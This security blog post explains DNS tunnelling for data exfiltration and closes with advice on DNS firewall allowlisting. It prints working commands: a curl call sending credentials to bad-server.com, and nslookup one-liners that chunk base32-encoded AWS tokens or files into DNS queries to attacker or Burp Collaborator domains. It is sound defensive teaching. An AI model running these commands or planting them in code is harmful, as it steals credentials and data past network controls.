Data exfiltration via DNS tunnelling

If you've ever wondered whether your sensitive data is sufficiently protected against various forms of exfiltration, you might want to take into consideration a trending attack known as DNS Tunneling.


Data exfiltration is a topic of concern when it comes to handling very sensitive data like Personally Identifiable Information (PII) such as email addresses, mailing addresses, and mobile numbers, or in the context of a PCI-DSS environment, cardholder data such as Credit Card Numbers or Permanent Account Numbers (PAN). As its name suggests, data exfiltration refers to the idea of copying or transferring data out of an environment to somewhere unintended that a malicious user has control of.

As a whole, data exfiltration is particularly concerning for many reasons, but very simply speaking, it’s a form of attack that can often be seen in malware, which could appear under the disguise of dependencies and packages (AKA our NodeJS dependencies or python packages) as described in this blogpost by Snyk.

In essence, there is quite a possibility that we end up installing a malicious dependency that when installed, would be making attempts to exfiltrate sensitive data (not just PII, but potentially IAM role credentials if the malicious dependency detects itself to be in an AWS environment, which can be subsequently used to escalate one’s privileges). As described in this article, it is indeed very possible that a malicious Python package is being used to exfiltrate AWS credentials and environment variables and we might or might not be indirectly relying on these packages unknowingly.

In this post, we will discuss an interesting way in which a malicious actor makes use of DNS tunneling to exfiltrate data purely through the use of DNS queries.

DNS Tunneling

For a PCI-DSS environment oftentimes we would be employing the strictest of security rules such as having very restricted and limited SSH access, or running a proxy and allowing web connections only through HTTPS to whitelisted domain names, which is definitely a good and effective security measure. However, we must not forget that not only does web traffic exist, but network traffic (specifically DNS in this context) is something that a malicious actor can leverage as well. DNS tunneling is one of the stealthier but common methods which a malicious actor could make use of, especially for malware to communicate back to its C2 server, like how the B1txor20 Linux Botnet worked.

What is DNS Tunneling?

DNS Tunneling in short, refers to the idea of encoding and hiding data within DNS queries and responses. For example, if we had the following set of data username=quentin&password=P@ssw0rd, and we wished to exfiltrate this set of data, one simple way by using a web request would be to make a curl command to our C2 server such as:

curl https://bad-server.com?username=quentin&password=P@ssw0rd

But that would not work for environments that are hidden behind a web proxy that allows only for web traffic to whitelisted domains, which is a seemingly and presumably, common implementation today.

Using DNS Tunneling to Exfiltrate

So how can one make use of the DNS protocol to exfiltrate such data? In short, the idea is simply to encode the sensitive data into a subdomain of the domain name that a malicious actor controls.

We assume the malicious actor’s adversary model to include full control over a public server and a domain name, with full read access to DNS queries of the domain name controlled by the malicious actor. In other words, all a malicious actor really needs to do is:

  • Purchase a domain
  • Buy your own server (EC2 Instances work)
  • Set up your server to run like a DNS server (hi BIND)
  • Enable DNS Logging

(Yes, anyone could do this, and it's really cheap!)

So technically, if the malicious actor controls bad-server.com, a malicious query that can be crafted would be encoded-data.bad-server.com. Encoding can come in many forms like base64/base32/base16/etc, but personally, I would go for base32 encoding (mostly for its simplicity and the fact that all the output characters would be considered valid domain characters), which basically encodes any piece of data into a string of characters that only contains [A-Z2-7]. So if I wanted to encode my payload username=quentin&password=P@ssw0rd, it would end up looking something like this:

$ echo "username=quentin&password=P@ssw0rd" | base32

So what do we do with our base32 encoded payload? Well, we use it to make a subdomain like OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK.bad-server.comand simply like that, we have a valid domain to make a DNS query for and that would be our final payload! We just need to make the DNS request for it, and to do that, we can use any DNS query tools like dig or nslookup to trigger a DNS query as such:


For demonstration purposes, we shall use Burp Collaborator, a feature of Burp Suite Pro that essentially allows one to view even DNS queries made against the domain name as provided by Burp Collaborator. In this case, instead of bad-server.com, our controlled domain name would be wrrdka0w59aszots2dlnvdrm6dc30s.oastify.com, and that makes our final payload for exfiltration

$ nslookup OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK.wrrdka0w59aszots2dlnvdrm6dc30s.oastify.com


Great, we now have the encoded version of the exfiltrated data as seen from Burp Collaborator, all that’s left to do is to decode it back to its original form to see the actual data!

## username=quentin&password=P@ssw0rd

Getting Around Domain Name Length Limits

Domain names, of course, have limits in terms of their length. Between each element of a domain name, separated by the . (also called a “label”), there is a maximum length of 63 characters. If we wanted to make create our payload as described above, to keep it within a single label we have to restrict the data to be under 63 characters or less.

This means that the data we wish to encode and disguise as a single subdomain would be limited to just 63 characters, so if our encoded payload exceeds this 63 character limit, the payload would be considered as an invalid domain name and the query wouldn’t go through.

Well, good thing we are (generally) not limited by the number of DNS queries. A very simple but effective workaround for this domain length limit would be to simply split our payload into separate DNS queries.

Now, let’s assume a longer piece of data, and in this case, we use the example of a temporary AWS token that we’ve stored into a bash variable $token. A sample token would look something like this


When we run a base32 encode on the token, notice how it’s split into lines that cap out at a maximum 76 characters per line (We also remove the ending = character with sed as those are invalid characters in a domain).


Knowing this pattern, one way we can automate this exfiltration would be to split each line into 2 chunks, the first chunk containing 63 characters and the second chunk containing the remaining characters. We then, for each chunk, make a DNS query using nslookup. An example one-liner script to automate the whole exfiltration could be something like this:

$ for i in $(echo $token | base32 | sed 's/=//g'); do nslookup ${i:0:63}.bad-server.com; nslookup ${:63}.bad-server.com; done

Great! Now all we have to do is combine back the base32-encoded payload from the subdomains, decode it and poof, we have our exfiltrated token!

The same concept can be applied across any kind of data, and this concept can even apply to files like images and PDFs as well, which leads us to the next subsection.

Exfiltrating files through DNS Tunneling

So far, this post has discussed about how one can exfiltrate text data through a bunch of DNS queries by hiding parts and chunks of the encoded payload into a subdomain that gets queried for. How about binary files? Well in theory, any kind of data that can be encoded into a valid subdomain(s) can technically be exfiltrated. In other words, if we can find a way to convert a file into its base32 form, the exfiltration process would be trivial.

This is where cat can come in handy. The cat command essentially reads files and writes them to standard output. It doesn’t matter that the output shows seemingly gibberish content, because at the end of the day our goal is to encode the data into its base32 form. By simply running cat file.jpeg | base32, we can essentially convert file.jpeg into its base32 form. For demonstration purposes, we will convert the image peepoded.jpg into its base32 form.




Great! We have shown a way to convert even an image file (and by extension, almost any sort of file actually) into its base32 form and from here on, sending the file through DNS queries is really a matter of running the same commands as described in the previous subsection again and capture it in Burp Collaborator

for i in $(cat peepoded.jpg | base32); do nslookup ${i:0:63}.aesm8s7i08nnkmx3jh61drevcmic61.oastify.com; nslookup ${i:63}.aesm8s7i08nnkmx3jh61drevcmic61.oastify.com; done


And now to simply combine the exfiltrated data back into its encoded form and voila, we would have our original image back!

$ echo $image | base32 -d > file.jpg

As a proof of concept, we make use of the exfiltrated data and use it to convert the image back into its original form:


DNS Tunneling Defense using DNS Firewall Rules

If you’re really worried about data exfiltration due to DNS Tunneling and wondering about how you can implement defenses against this, one proposed method that can be adopted would be to implement/configure for DNS firewalling. A great example of this would be AWS’s Route53 DNS Firewall, in which you can configure whitelisting/blacklisting rules. A proposed approach would be to apply a blacklist rule that denies all domains, and then apply a whitelist rule that allows for the specified whitelisted domains, and assign this whitelist rule a higher priority than the blacklist rule. Just be aware that in the case of Route53’s DNS firewall, even the recursively resolved domain names have to be whitelisted for. For example, if you wished to whitelist the domain console.aws.amazon.com, do perform an actual query lookup for the recursive CNAME results as well with a tool like nslookup or dig as shown below:


In addition to having to whitelist console.aws.amazon.com, it is possible that your DNS firewall also requires you to whitelist the recursive CNAME results, which in this case, would also include lbr.us.console.amazonaws.com, us-west-2.console.aws.amazon.com, gr.console-geo.us-west-2.amazonaws.com, aad44edbebc6c7a36.awsglobalaccelerator.com.

To wrap it all up like a burrito

In this post, we’ve discussed about how a malicious actor can make use of DNS tunneling to exfiltrate sensitive data and files purely through the use of DNS queries, altogether bypassing web level proxies, as well as provided some references to how common and likely it is that a public package/dependency or library that contains malicious code would be making attempts at performing data exfiltration or DNS tunneling and that these are indeed very legitimate concerns.

We’ve also talked about how malware that aims to perform such data exfiltration through DNS tunneling can appear through malicious dependencies and packages that were unintentionally installed, and how ultimately, potential DNS tunneling defenses would probably revolve around the idea of domain name whitelisting, and that it is not sufficient to simply just perform filtering at the web level.